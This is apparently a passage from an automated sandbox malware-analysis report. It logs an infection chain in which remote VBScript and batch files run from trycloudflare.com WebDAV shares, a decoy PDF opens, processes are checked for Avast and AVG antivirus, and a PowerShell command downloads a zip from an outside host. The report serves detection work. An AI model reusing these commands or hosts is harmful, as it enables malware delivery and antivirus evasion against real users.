      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BNAGMGSPLO.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1592,i,10281538565762986671,7126053446224779264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BNAGMGSPLO.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 9568E4707CA0E648B438173E78FCDEBC
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1592,i,10281538565762986671,7126053446224779264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"

      Persistence and Installation Behavior

      barindex
      Chrome launches external ms-search protocol handler (WebDAV)
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\msc4dfl1ed7eb485ad6ahelixpflanzen.de@5515\DavWWWRoot
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\msc4dfl1ed7eb485ad6ahelixpflanzen.de@5515\DavWWWRoot
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 2610
      Source: unknownNetwork traffic detected: HTTP traffic on port 2610 -> 49741
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
